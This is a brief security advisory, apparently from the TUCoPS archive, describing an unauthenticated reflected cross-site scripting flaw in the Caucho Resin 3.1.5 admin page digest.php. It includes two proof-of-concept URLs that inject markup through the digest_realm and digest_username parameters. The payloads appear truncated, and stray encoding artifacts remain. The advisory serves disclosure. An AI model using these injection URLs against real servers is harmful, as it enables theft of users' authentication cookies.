Caucho Technology Resin digest.php Cross Site Scripting Vulnerability
Caucho Technology Resin digest.php Cross Site Scripting Vulnerability
This vulnerability do not need to login.digest.php use the REQUEST method in a wrong way to accept parameters,the malicious user could submit xss code on this page and an attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.=0D
=0D
exp:=0D
=0D
http://test.com/resin-admin/digest.php?digest_attempt=1&digest_realm=">
http://test.com/resin-admin/digest.php?digest_attempt=1&digest_username=">
=0D
Test on Resin Professional 3.1.5
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
